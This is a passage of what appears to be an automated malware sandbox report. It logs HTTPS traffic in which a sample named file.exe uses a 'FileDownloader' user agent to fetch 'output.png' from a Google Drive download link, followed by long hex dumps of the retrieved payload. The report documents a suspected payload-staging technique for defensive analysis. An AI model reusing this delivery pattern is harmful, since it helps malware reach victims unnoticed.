                                                                                                                                                                        Data Ascii: q{{1];c5j%0Ha.c=hE9_^=:EB~nN6"OR-S+`,mW$F3A$1/fg^x$8%r-aGF/{***+r}zqAsS:&_AmvI)i^F!Cy.
                                                                                                                                                                        2024-12-12 15:53:49 UTC1390INData Raw: 64 c9 01 31 5f 38 fa d4 e1 44 ca 62 27 27 35 d4 6f 18 76 3e 6d aa 7b 13 27 9e d8 41 74 2c 52 eb a4 65 62 4b ab 6a 04 49 16 eb a2 40 51 14 5b 13 5b 45 45 c5 90 40 20 b0 ac 61 4b 19 b3 73 69 5f 30 73 a4 67 39 21 5d e6 d2 e2 e1 76 bb bf 54 55 f5 94 11 ea c0 71 2f df 34 e9 1b 33 7b bf ed aa ad c5 cb 1f 97 7b a7 fc df f3 df 4c 7b ec c9 07 96 2c 59 b2 67 f1 84 d1 e3 4e 26 e6 7f 03 e8 68 71 f8 49 c2 23 a9 36 eb 1d 99 dc 52 5b 5a 26 36 d9 63 4b 9c e8 1e 9b df ef ef ac eb fa 6c 45 51 3e 8d 63 2e 6d 33 80 c9 95 95 95 47 78 bd de 8f 2c 0e 31 e5 79 3c 9e f9 a1 ea ea c2 cb 7f 3f b2 64 de f5 57 d4 1c ef 1e d0 e2 31 5f ae ff d9 75 db bc d7 26 dd 31 ff ed 5f 1e 2d 7b e9 94 e8 83 23 c6 1f 49 4c 73 01 a4 da 3e 70 47 50 6d d6 ab 38 f1 c4 54 8b 5b 6a 60 45 69 2a c7 93 3d b6
                                                                                                                                                                        Data Ascii: d1_8Db''5ov>m{'At,RebKjI@Q[[EE@ aKsi_0sg9!]vTUq/43{{L{,YgN&hqI#6R[Z&6cKlEQ>c.m3Gx,1y<?dW1_u&1_-{#ILs>pGPm8T[j`Ei*=
                                                                                                                                                                        2024-12-12 15:53:49 UTC1390INData Raw: fd 13 11 fd c1 ed 76 1f 2f 93 5a ea 61 d0 6f 45 c7 20 04 e3 38 d1 21 48 b1 a5 65 62 4b eb ca 23 44 97 88 f8 bb bf ba f5 3f 30 f6 dc ee 26 c4 cc f7 e7 e4 e4 0c f0 78 3c 73 88 28 0d 2f fc 53 5c fd ea c0 be a2 c3 10 41 01 62 de ce 22 89 97 96 43 91 69 dd 63 63 9c 26 a2 d9 f5 75 3b b1 b2 7a 0b 3c b9 9d 23 ff 5c 6a 18 c6 55 45 45 45 01 11 b1 48 49 b2 a1 ba 1f 6c de 39 dd 29 98 94 96 77 5f 95 84 49 cb c4 96 b6 3d b6 17 6f 3b 18 e1 70 6f 51 cd 2f db f9 f3 36 b5 5d 97 ab dc 6e f7 33 b2 87 d6 06 b8 70 68 fa 6e c1 c9 fd 44 47 20 c5 96 96 43 91 69 db 63 0b 87 3d 22 9b 7f fc d7 55 af cb 61 c7 36 c4 50 ba 88 0e 41 a0 74 fe d9 1d 2f 2d 13 5b da f6 d8 80 83 44 36 5e cb c6 7e 22 db 97 92 8c 90 2f 3a 04 81 da a1 b8 38 2d 87 61 53 41 5a 26 b6 b4 ed b1 11 89 fe 22 6a 7d 2d
                                                                                                                                                                        Data Ascii: v/ZaoE 8!HebK#D?0&x<s(/S\Ab"Cicc&u;z<#\jUEEEHIl9)w_I=o;poQ/6]n3phnDG Cic="Ua6PAt/-[D6^~"/:8-aSAZ&"j}-
                                                                                                                                                                        2024-12-12 15:53:49 UTC1390INData Raw: d4 66 5f d7 50 8e ca 11 fc 7e ff 68 8a f4 2a e3 1f 92 dd c0 cc f7 b8 5c ae fb dd 6e 77 6d b3 af 9c 37 b3 1f 98 4f 06 f3 71 00 0a 33 48 39 28 c4 46 6e b6 e2 42 47 25 13 bd b3 f3 a1 e6 74 46 2e 65 dc f9 f0 7b c1 5b ea 6f d6 8d 4f 30 18 1c 69 18 c6 7d 00 8a 4c bc 3c 72 fe 7f 19 86 71 9d 9c 7f 73 a8 91 a7 5e 40 c4 73 44 87 61 85 1e 9d 3a 18 af dd 34 59 d9 ab b7 d6 94 85 8a a2 5c ef 76 bb 57 d8 13 99 35 64 62 4b a6 25 5a 06 36 d0 6d 60 dc e0 b0 d8 be 03 f1 d9 a2 7b 6f c1 60 f0 08 c3 30 ee 02 30 3c ce 43 77 12 d1 43 d9 d9 d9 77 f4 eb d7 2f a1 aa 23 81 40 60 02 33 3f dd c4 53 13 54 55 7d 26 91 73 62 cf f9 b7 bf 02 e8 69 e2 90 2d cc 3c ab ad ce 6d a4 ba 4e e3 ce 29 df ba 63 e7 61 a2 e3 48 b6 03 ba 77 bd e8 cd 5b ae 29 60 e6 ab 4d 8c 20 19 44 f4 62 38 1c be b1 a8
                                                                                                                                                                        Data Ascii: f_P~h*\nwm7Oq3H9(FnBG%tF.e{[oO0i}L<rqs^@sDa:4Y\vW5dbK%Z6m`{o`00<CwCw/#@`3?STU}&sbi-<mN)caHw[)`M Db8
                                                                                                                                                                        2024-12-12 15:53:49 UTC1390INData Raw: 13 d8 5d 61 21 11 5d e7 f1 78 2a 12 0b 33 71 4e 4a 6c d8 f3 fe b7 bb 00 34 b9 2f ce 5e 22 1f c6 7b f2 f2 f2 66 f5 e9 d3 a7 3a e9 01 cd d3 0a 60 28 8f 00 3c 32 e9 e7 ae f7 31 14 ba dc 8e 1e 1c 33 93 ae eb 67 2a 8a f2 57 66 ee 6d e2 90 3a 00 8f d6 d4 d4 4c 8b 39 7a 70 e2 89 1d a8 2e eb 19 30 c6 25 3d e0 e4 d8 c9 e0 cb b0 e8 b5 a4 57 ee 0f 04 02 87 37 bc 4f cd 5c ec 54 01 b8 77 fb f6 ed 77 0d 1b 36 6c 57 b2 63 31 4b 26 b6 78 2c d1 32 f0 2b 95 9b ac 34 91 5a 18 e7 c6 aa 91 88 fa f9 89 bc 70 38 7c 05 11 45 7a aa f9 71 9e fd f3 86 1e 87 b0 72 3d 4e 4b 6c 8d 12 98 7f fb 8e 88 6e 71 bb dd cf 50 32 7a 40 d1 32 64 33 af 07 f3 4c 1b 4a bf 85 41 7c 17 ba 61 3a 46 68 21 2b 1a 68 28 02 70 3f 80 61 26 0f 59 00 60 b2 aa aa 5f 99 78 2d 61 d4 b8 89 04 fa ab a0 32 79 4d 63
                                                                                                                                                                        Data Ascii: ]a!]x*3qNJl4/^"{f:`(<213g*Wfm:L9zp.0%=W7O\Tww6lWc1K&x,2+4Zp8|Ezqr=NKlnqP2z@2d3LJA|a:Fh!+h(p?a&Y`_x-a2yMc
                                                                                                                                                                        2024-12-12 15:53:49 UTC1390INData Raw: 36 3e 10 0c 06 b3 0c c3 f8 4b c3 76 40 66 4a 3c 59 33 8f 66 b1 55 ab 56 ed b7 69 db f6 1f 8e b9 e9 b6 7d 9e cb ca 70 7d 53 f3 d6 4b 29 57 d2 0b 7b ee 92 3f cb 64 e9 c1 55 0d c3 93 ff db 19 bf 74 c6 61 00 47 7a dc ed 2c 0e f7 13 6c ee f5 5b 5c 76 59 9d c5 ed 98 62 fd 4d d2 75 a1 51 e9 94 d4 22 96 55 35 b9 0a 7b 33 33 4f d9 be 7d 7b 7f af d7 fb 44 2a 25 b5 b6 24 f2 81 f7 7a bd 65 35 35 35 85 91 bf 47 c3 0d b1 cd 69 0f 60 7a be c2 6b 1c 9c d4 10 fd e2 0a 85 fe 5b b7 34 10 08 8c 35 0c a3 12 c0 03 26 93 da 02 c3 30 0a 54 55 9d 94 4a 49 ad 25 6c 38 6e 6f 47 d3 88 c8 88 bc 57 15 45 19 c8 cc 97 01 f8 b5 85 43 0a 88 a8 34 10 08 2c ab a8 a8 f8 2d 4a ef cb 05 b8 d4 86 a4 16 71 24 3a fd 74 8d 0d ed 98 62 7d 62 53 8c 64 95 16 4a 19 eb 6a b7 e3 97 d0 7f 17 d7 d5 11 d1
                                                                                                                                                                        Data Ascii: 6>Kv@fJ<Y3fUVi}p}SK)W{?dUtaGz,l[\vYbMuQ"U5{33O}{D*%$ze555Gi`zk[45&0TUJI%l8noGWEC4,-Jq$:tb}bSdJj
                                                                                                                                                                        2024-12-12 15:53:49 UTC1390INData Raw: d3 09 73 6b 8d ec b9 9a a1 e8 d6 fb e9 e2 5b f8 a6 a7 65 25 f5 36 c9 37 65 2b 88 e7 8b 0e c3 3c 7a 17 be 5b e5 fc 5a 23 4a e3 1e 5b 23 9f 36 1d e0 87 2d 3a fb 66 80 4f c6 99 b7 ae b5 e8 fc 09 b1 e7 8f ce c6 4b f5 bf 80 74 40 4f 82 c8 8e ae bf 64 17 c6 bd a2 43 30 8d f9 3e d1 21 38 4c fa ce b1 ed ce a7 5d 05 a6 9b 93 3c 2d f4 15 14 fa 2d 7c da a7 49 3c 67 52 d8 93 d8 7c 5a 15 08 56 5d 31 38 c9 0e 84 8c bf 89 0e 42 4a b2 e8 07 37 25 e6 da 56 c0 37 6d 81 e8 20 1c 25 cd b6 ad 69 d6 59 d3 ee 00 f1 68 00 5f b6 f2 4c 0c c6 53 a8 e5 21 38 73 5a 30 49 d1 25 95 7d dd 74 e6 07 c4 dc 57 61 a3 48 f2 3e 57 13 b9 75 ad 64 15 c3 b8 1a 80 c3 57 1a f2 b5 72 b4 60 4f 9c 26 1b 8d 9a 56 ac 2d c5 0e 56 c1 b8 06 c0 0f f1 1c 1a b9 42 c8 20 d7 3b 30 78 18 ce 9a 7e 31 ce d7 1c 5b
                                                                                                                                                                        Data Ascii: sk[e%67e+<z[Z#J[#6-:fOKt@OdC0>!8L]<--|I<gR|ZV]18BJ7%V7m %iYh_LS!8sZ0I%}tWaH>WudWr`O&V-VB ;0x~1[
                                                                                                                                                                        2024-12-12 15:53:49 UTC1390INData Raw: ce 8f ee 59 d3 1b 5a 86 bb fe b5 84 10 b1 ac aa 52 ee d8 e2 4c f4 25 b6 9f 3b 3e b5 7a c9 cf db 1a 7d a2 aa 5f 02 b8 a4 91 33 f8 d1 4b af 59 6f 5c 80 42 08 53 25 27 c9 1d 5b 9c 89 fe c4 26 c2 e7 83 89 6d 91 58 75 29 98 2e fc e3 77 05 03 bb da 5a c1 4a 0a da 58 12 71 8e 2d 1d 99 49 6d 71 76 62 9a d9 51 8a 78 33 60 e8 79 00 2e 86 82 6e 0a 73 87 4b 1e 71 b6 fe 5d 2f 47 d3 c7 fb 6a 25 b1 c5 19 49 6c e2 a7 16 bc 6a c3 d1 c3 7f 04 f1 dd 40 75 5f 30 d5 95 71 5c 15 07 eb fe f9 b9 54 8b f5 65 e4 8c eb 06 9f e5 1f f8 c3 98 9d 66 84 2c e2 c0 95 43 4e 57 34 ba 97 81 3f 02 7c 5e dd d7 f8 78 3b a0 d2 63 15 f8 78 c5 d7 4d 9f 5b 5d 25 a5 c8 38 23 bf 70 71 1c 33 21 67 dc 9f 51 76 e8 3b 10 ff 0b c0 65 7a de 1f e5 be da 0e 00 46 c3 e2 fb 06 1f 3b 5f 47 8e 33 12 16 d5 8b 58
                                                                                                                                                                        Data Ascii: YZRL%;>z}_3KYo\BS%'[&mXu).wZJXq-ImqvbQx3`y.nsKq]/Gj%Ilj@u_0q\Tef,CNW4?|^x;cxM[]%8#pq3!gQv;ezF;_G3X


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        3192.168.2.949725142.250.181.654437540C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-12 15:53:47 UTC192OUTGET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                        User-Agent: FileDownloader
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2024-12-12 15:53:52 UTC4915INHTTP/1.1 200 OK
                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        Content-Disposition: attachment; filename="output.png"
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        Content-Length: 156917
                                                                                                                                                                        Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT
                                                                                                                                                                        X-GUploader-UploadID: AFiumC6Wtk48iU8t_R1-RLZE6fXh-9JdkKOKLH9qTtS2ktuTd3Au5wAHa6Jm0l_KM5Q4_ohuuBE
                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:53:51 GMT
                                                                                                                                                                        Expires: Thu, 12 Dec 2024 15:53:51 GMT
                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                        X-Goog-Hash: crc32c=h6mvlQ==
                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                        Connection: close
                                                                                                                                                                        2024-12-12 15:53:52 UTC4915INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b6 00 00 01 b6 08 06 00 00 00 13 09 a3 70 00 00 80 00 49 44 41 54 78 9c ec dd 07 7c 14 65 fa 07 f0 df 33 9b 0a 09 bd 9d 15 44 20 64 77 36 80 d8 d0 53 9a dc 59 00 5b d6 ce a9 e7 e9 9d 05 b0 23 2a 4c c0 82 67 c5 72 96 bb bf 9e e8 a9 24 58 41 3d 95 66 c3 16 85 ec ec 12 8a 8a 9e 05 0b 9d 00 29 bb f3 fc 3f bb 49 ee 28 d9 64 76 b3 33 ef 6c f6 fd 7e 3e 7e 3e b2 bb 33 ef 93 64 77 9f 79 cb 3c 6f 06 24 49 b2 ce a8 d3 ba 82 c2 c7 2b 8c 61 0c 14 02 74 08 08 3d c0 68 0f 80 40 a8 02 d3 06 10 af 23 c6 2a 03 fc 11 80 25 58 f4 da cf a2 43 97 a4 54 45 a2 03 90 a4 36 67 cc 98 f6 08 e5 fa 88 30 01 c0 71 00 94 04 ce f2 11 13 3d 03 64 3e 87 85 65 5b 2d 88 52 92 da 2c 99 d8 24 29 59 4e 3c b1 03 ea 32 27 12 d3 24 00 dd 92
                                                                                                                                                                        Data Ascii: PNGIHDRpIDATx|e3D dw6SY[#*Lgr$XA=f)?I(dv3l~>~>3dwy<o$I+at=h@#*%XCTE6g0q=d>e[-R,$)YN<2'$
                                                                                                                                                                        2024-12-12 15:53:52 UTC4868INData Raw: b8 8f 6d b0 aa aa 13 4c 25 b5 58 26 5c bf 63 68 76 d7 cd 7b 27 b5 86 36 04 d4 e8 92 a4 ff 71 b9 5c 31 df 83 59 59 59 09 ed b7 e6 76 bb ab 54 55 d5 5c 2e 97 4a f1 d7 58 ed 07 60 7e 43 79 ae c2 44 da 97 12 27 13 9b 43 31 33 05 02 81 09 86 61 7c 19 b9 02 8c e3 8a b1 d1 97 cc ec f3 7a bd a3 54 55 4d ca 0e c1 2e 97 ab c9 2f 08 22 11 c5 27 25 e9 7f 9a 9b 63 ab ae ae 6e d5 46 a2 85 85 85 6b 3d 1e 8f cf 30 8c d1 09 ec 8e d1 58 9e 6b 76 79 79 79 c7 d6 c4 21 99 27 13 9b 03 05 02 81 c3 03 81 c0 32 66 7e 3a c1 31 fe 92 9c 9c 1c 8f d7 eb 4d 6a 25 ff 70 38 dc e4 17 84 ec b1 49 a2 35 d7 63 cb cd cd 4d ca 0e d9 45 45 45 8b 36 6c d8 30 84 99 2f 03 f0 6b 1c 87 66 02 98 98 9d 9d fd 95 ae eb 93 4a 4b 4b e5 e7 c5 62 32 b1 39 c8 aa 55 ab f6 6b 28 83 f5 09 80 a3 e2 3c dc 00 a2
                                                                                                                                                                        Data Ascii: mL%X&\chv{'6q\1YYYvTU\.JX`~CyD'C13a|zTUM./"'%cnFk=0Xkvyyy!'2f~:1Mj%p8I5cMEEE6l0/kfJKKb29Uk(<
                                                                                                                                                                        2024-12-12 15:53:52 UTC1322INData Raw: 53 a2 8c 51 20 10 18 bb 71 7b d5 a3 7f 7f 7b e9 fe cf bf ff 31 0c 13 c3 93 5d 3b e4 1b 63 06 b9 9f ef cf 35 17 6a 9a e6 8c 25 e4 a3 c6 17 82 30 48 61 2e 00 63 00 13 f6 03 a8 3d c0 1d 81 68 45 ff 1a 10 aa 86 f4 39 b8 5f df 5e 3d 3a 1c dc a3 1b 0e e9 d9 1d 45 bd 0f 42 7e 6e 4e a4 c7 36 d3 e3 f1 d8 ba 22 4f b8 52 2d 0b c0 53 00 9d 2b a0 f5 1d 60 f6 e1 2c ed 0d 01 6d ff 57 ea 24 b6 46 a5 33 fb 80 8d 1b 41 f8 03 80 9c 24 9c 31 08 c2 9d e0 81 2f a4 fb cd d7 66 04 02 81 a7 98 f9 c2 bd 1f 67 e6 81 5e af d7 f6 b1 f4 78 24 38 ec b8 25 72 2d bc 61 c3 86 47 46 8c 18 e1 8c 2f 7b 93 2a 2a 2a da 2b 8a 72 7d e0 bb 1f a6 ce 7a 71 41 a6 ff 1b 73 53 a0 9e 83 f6 af 3a a1 c8 f3 97 fb 26 5f fe ac e5 41 ee 6d ec d8 76 d8 49 a7 29 84 93 99 69 04 80 5e 89 9c 46 21 c2 c0 03 f6 43
                                                                                                                                                                        Data Ascii: SQ q{{1];c5j%0Ha.c=hE9_^=:EB~nN6"OR-S+`,mW$F3A$1/fg^x$8%r-aGF/{***+r}zqAsS:&_AmvI)i^F!C
                                                                                                                                                                        2024-12-12 15:53:52 UTC1390INData Raw: 64 c9 01 31 5f 38 fa d4 e1 44 ca 62 27 27 35 d4 6f 18 76 3e 6d aa 7b 13 27 9e d8 41 74 2c 52 eb a4 65 62 4b ab 6a 04 49 16 eb a2 40 51 14 5b 13 5b 45 45 c5 90 40 20 b0 ac 61 4b 19 b3 73 69 5f 30 73 a4 67 39 21 5d e6 d2 e2 e1 76 bb bf 54 55 f5 94 11 ea c0 71 2f df 34 e9 1b 33 7b bf ed aa ad c5 cb 1f 97 7b a7 fc df f3 df 4c 7b ec c9 07 96 2c 59 b2 67 f1 84 d1 e3 4e 26 e6 7f 03 e8 68 71 f8 49 c2 23 a9 36 eb 1d 99 dc 52 5b 5a 26 36 d9 63 4b 9c e8 1e 9b df ef ef ac eb fa 6c 45 51 3e 8d 63 2e 6d 33 80 c9 95 95 95 47 78 bd de 8f 2c 0e 31 e5 79 3c 9e f9 a1 ea ea c2 cb 7f 3f b2 64 de f5 57 d4 1c ef 1e d0 e2 31 5f ae ff d9 75 db bc d7 26 dd 31 ff ed 5f 1e 2d 7b e9 94 e8 83 23 c6 1f 49 4c 73 01 a4 da 3e 70 47 50 6d d6 ab 38 f1 c4 54 8b 5b 6a 60 45 69 2a c7 93 3d b6
                                                                                                                                                                        Data Ascii: d1_8Db''5ov>m{'At,RebKjI@Q[[EE@ aKsi_0sg9!]vTUq/43{{L{,YgN&hqI#6R[Z&6cKlEQ>c.m3Gx,1y<?dW1_u&1_-{#ILs>pGPm8T[j`Ei*=
                                                                                                                                                                        2024-12-12 15:53:52 UTC1390INData Raw: fd 13 11 fd c1 ed 76 1f 2f 93 5a ea 61 d0 6f 45 c7 20 04 e3 38 d1 21 48 b1 a5 65 62 4b eb ca 23 44 97 88 f8 bb bf ba f5 3f 30 f6 dc ee 26 c4 cc f7 e7 e4 e4 0c f0 78 3c 73 88 28 0d 2f fc 53 5c fd ea c0 be a2 c3 10 41 01 62 de ce 22 89 97 96 43 91 69 dd 63 63 9c 26 a2 d9 f5 75 3b b1 b2 7a 0b 3c b9 9d 23 ff 5c 6a 18 c6 55 45 45 45 01 11 b1 48 49 b2 a1 ba 1f 6c de 39 dd 29 98 94 96 77 5f 95 84 49 cb c4 96 b6 3d b6 17 6f 3b 18 e1 70 6f 51 cd 2f db f9 f3 36 b5 5d 97 ab dc 6e f7 33 b2 87 d6 06 b8 70 68 fa 6e c1 c9 fd 44 47 20 c5 96 96 43 91 69 db 63 0b 87 3d 22 9b 7f fc d7 55 af cb 61 c7 36 c4 50 ba 88 0e 41 a0 74 fe d9 1d 2f 2d 13 5b da f6 d8 80 83 44 36 5e cb c6 7e 22 db 97 92 8c 90 2f 3a 04 81 da a1 b8 38 2d 87 61 53 41 5a 26 b6 b4 ed b1 11 89 fe 22 6a 7d 2d
                                                                                                                                                                        Data Ascii: v/ZaoE 8!HebK#D?0&x<s(/S\Ab"Cicc&u;z<#\jUEEEHIl9)w_I=o;poQ/6]n3phnDG Cic="Ua6PAt/-[D6^~"/:8-aSAZ&"j}-
                                                                                                                                                                        2024-12-12 15:53:52 UTC1390INData Raw: d4 66 5f d7 50 8e ca 11 fc 7e ff 68 8a f4 2a e3 1f 92 dd c0 cc f7 b8 5c ae fb dd 6e 77 6d b3 af 9c 37 b3 1f 98 4f 06 f3 71 00 0a 33 48 39 28 c4 46 6e b6 e2 42 47 25 13 bd b3 f3 a1 e6 74 46 2e 65 dc f9 f0 7b c1 5b ea 6f d6 8d 4f 30 18 1c 69 18 c6 7d 00 8a 4c bc 3c 72 fe 7f 19 86 71 9d 9c 7f 73 a8 91 a7 5e 40 c4 73 44 87 61 85 1e 9d 3a 18 af dd 34 59 d9 ab b7 d6 94 85 8a a2 5c ef 76 bb 57 d8 13 99 35 64 62 4b a6 25 5a 06 36 d0 6d 60 dc e0 b0 d8 be 03 f1 d9 a2 7b 6f c1 60 f0 08 c3 30 ee 02 30 3c ce 43 77 12 d1 43 d9 d9 d9 77 f4 eb d7 2f a1 aa 23 81 40 60 02 33 3f dd c4 53 13 54 55 7d 26 91 73 62 cf f9 b7 bf 02 e8 69 e2 90 2d cc 3c ab ad ce 6d a4 ba 4e e3 ce 29 df ba 63 e7 61 a2 e3 48 b6 03 ba 77 bd e8 cd 5b ae 29 60 e6 ab 4d 8c 20 19 44 f4 62 38 1c be b1 a8
                                                                                                                                                                        Data Ascii: f_P~h*\nwm7Oq3H9(FnBG%tF.e{[oO0i}L<rqs^@sDa:4Y\vW5dbK%Z6m`{o`00<CwCw/#@`3?STU}&sbi-<mN)caHw[)`M Db8
                                                                                                                                                                        2024-12-12 15:53:52 UTC1390INData Raw: 13 d8 5d 61 21 11 5d e7 f1 78 2a 12 0b 33 71 4e 4a 6c d8 f3 fe b7 bb 00 34 b9 2f ce 5e 22 1f c6 7b f2 f2 f2 66 f5 e9 d3 a7 3a e9 01 cd d3 0a 60 28 8f 00 3c 32 e9 e7 ae f7 31 14 ba dc 8e 1e 1c 33 93 ae eb 67 2a 8a f2 57 66 ee 6d e2 90 3a 00 8f d6 d4 d4 4c 8b 39 7a 70 e2 89 1d a8 2e eb 19 30 c6 25 3d e0 e4 d8 c9 e0 cb b0 e8 b5 a4 57 ee 0f 04 02 87 37 bc 4f cd 5c ec 54 01 b8 77 fb f6 ed 77 0d 1b 36 6c 57 b2 63 31 4b 26 b6 78 2c d1 32 f0 2b 95 9b ac 34 91 5a 18 e7 c6 aa 91 88 fa f9 89 bc 70 38 7c 05 11 45 7a aa f9 71 9e fd f3 86 1e 87 b0 72 3d 4e 4b 6c 8d 12 98 7f fb 8e 88 6e 71 bb dd cf 50 32 7a 40 d1 32 64 33 af 07 f3 4c 1b 4a bf 85 41 7c 17 ba 61 3a 46 68 21 2b 1a 68 28 02 70 3f 80 61 26 0f 59 00 60 b2 aa aa 5f 99 78 2d 61 d4 b8 89 04 fa ab a0 32 79 4d 63
                                                                                                                                                                        Data Ascii: ]a!]x*3qNJl4/^"{f:`(<213g*Wfm:L9zp.0%=W7O\Tww6lWc1K&x,2+4Zp8|Ezqr=NKlnqP2z@2d3LJA|a:Fh!+h(p?a&Y`_x-a2yMc
                                                                                                                                                                        2024-12-12 15:53:52 UTC1390INData Raw: 36 3e 10 0c 06 b3 0c c3 f8 4b c3 76 40 66 4a 3c 59 33 8f 66 b1 55 ab 56 ed b7 69 db f6 1f 8e b9 e9 b6 7d 9e cb ca 70 7d 53 f3 d6 4b 29 57 d2 0b 7b ee 92 3f cb 64 e9 c1 55 0d c3 93 ff db 19 bf 74 c6 61 00 47 7a dc ed 2c 0e f7 13 6c ee f5 5b 5c 76 59 9d c5 ed 98 62 fd 4d d2 75 a1 51 e9 94 d4 22 96 55 35 b9 0a 7b 33 33 4f d9 be 7d 7b 7f af d7 fb 44 2a 25 b5 b6 24 f2 81 f7 7a bd 65 35 35 35 85 91 bf 47 c3 0d b1 cd 69 0f 60 7a be c2 6b 1c 9c d4 10 fd e2 0a 85 fe 5b b7 34 10 08 8c 35 0c a3 12 c0 03 26 93 da 02 c3 30 0a 54 55 9d 94 4a 49 ad 25 6c 38 6e 6f 47 d3 88 c8 88 bc 57 15 45 19 c8 cc 97 01 f8 b5 85 43 0a 88 a8 34 10 08 2c ab a8 a8 f8 2d 4a ef cb 05 b8 d4 86 a4 16 71 24 3a fd 74 8d 0d ed 98 62 7d 62 53 8c 64 95 16 4a 19 eb 6a b7 e3 97 d0 7f 17 d7 d5 11 d1
                                                                                                                                                                        Data Ascii: 6>Kv@fJ<Y3fUVi}p}SK)W{?dUtaGz,l[\vYbMuQ"U5{33O}{D*%$ze555Gi`zk[45&0TUJI%l8noGWEC4,-Jq$:tb}bSdJj
                                                                                                                                                                        2024-12-12 15:53:52 UTC1390INData Raw: d3 09 73 6b 8d ec b9 9a a1 e8 d6 fb e9 e2 5b f8 a6 a7 65 25 f5 36 c9 37 65 2b 88 e7 8b 0e c3 3c 7a 17 be 5b e5 fc 5a 23 4a e3 1e 5b 23 9f 36 1d e0 87 2d 3a fb 66 80 4f c6 99 b7 ae b5 e8 fc 09 b1 e7 8f ce c6 4b f5 bf 80 74 40 4f 82 c8 8e ae bf 64 17 c6 bd a2 43 30 8d f9 3e d1 21 38 4c fa ce b1 ed ce a7 5d 05 a6 9b 93 3c 2d f4 15 14 fa 2d 7c da a7 49 3c 67 52 d8 93 d8 7c 5a 15 08 56 5d 31 38 c9 0e 84 8c bf 89 0e 42 4a b2 e8 07 37 25 e6 da 56 c0 37 6d 81 e8 20 1c 25 cd b6 ad 69 d6 59 d3 ee 00 f1 68 00 5f b6 f2 4c 0c c6 53 a8 e5 21 38 73 5a 30 49 d1 25 95 7d dd 74 e6 07 c4 dc 57 61 a3 48 f2 3e 57 13 b9 75 ad 64 15 c3 b8 1a 80 c3 57 1a f2 b5 72 b4 60 4f 9c 26 1b 8d 9a 56 ac 2d c5 0e 56 c1 b8 06 c0 0f f1 1c 1a b9 42 c8 20 d7 3b 30 78 18 ce 9a 7e 31 ce d7 1c 5b
                                                                                                                                                                        Data Ascii: sk[e%67e+<z[Z#J[#6-:fOKt@OdC0>!8L]<--|I<gR|ZV]18BJ7%V7m %iYh_LS!8sZ0I%}tWaH>WudWr`O&V-VB ;0x~1[
                                                                                                                                                                        2024-12-12 15:53:52 UTC1390INData Raw: ce 8f ee 59 d3 1b 5a 86 bb fe b5 84 10 b1 ac aa 52 ee d8 e2 4c f4 25 b6 9f 3b 3e b5 7a c9 cf db 1a 7d a2 aa 5f 02 b8 a4 91 33 f8 d1 4b af 59 6f 5c 80 42 08 53 25 27 c9 1d 5b 9c 89 fe c4 26 c2 e7 83 89 6d 91 58 75 29 98 2e fc e3 77 05 03 bb da 5a c1 4a 0a da 58 12 71 8e 2d 1d 99 49 6d 71 76 62 9a d9 51 8a 78 33 60 e8 79 00 2e 86 82 6e 0a 73 87 4b 1e 71 b6 fe 5d 2f 47 d3 c7 fb 6a 25 b1 c5 19 49 6c e2 a7 16 bc 6a c3 d1 c3 7f 04 f1 dd 40 75 5f 30 d5 95 71 5c 15 07 eb fe f9 b9 54 8b f5 65 e4 8c eb 06 9f e5 1f f8 c3 98 9d 66 84 2c e2 c0 95 43 4e 57 34 ba 97 81 3f 02 7c 5e dd d7 f8 78 3b a0 d2 63 15 f8 78 c5 d7 4d 9f 5b 5d 25 a5 c8 38 23 bf 70 71 1c 33 21 67 dc 9f 51 76 e8 3b 10 ff 0b c0 65 7a de 1f e5 be da 0e 00 46 c3 e2 fb 06 1f 3b 5f 47 8e 33 12 16 d5 8b 58
                                                                                                                                                                        Data Ascii: YZRL%;>z}_3KYo\BS%'[&mXu).wZJXq-ImqvbQx3`y.nsKq]/Gj%Ilj@u_0q\Tef,CNW4?|^x;cxM[]%8#pq3!gQv;ezF;_G3X


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
